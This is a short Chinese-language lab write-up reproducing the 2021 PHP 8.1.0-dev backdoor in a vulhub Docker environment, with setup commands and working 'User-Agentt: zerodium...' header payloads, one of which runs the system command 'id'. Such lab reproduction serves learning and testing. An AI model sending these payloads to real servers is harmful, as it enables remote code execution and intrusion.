PHP 8.1.0-dev开发版本后门事件
漏洞简述
PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。
环境搭建
cd /vulhub/php/8.1-backdoor
docker-compose up -d
复现测试
先打开burpsuite,抓取http://192.168.3.151:8080
数据包
构造payload
User-Agentt: zerodiumvar_dump(233*233);
执行一下系统命令
User-Agentt: zerodiumsystem('id');
ok结束!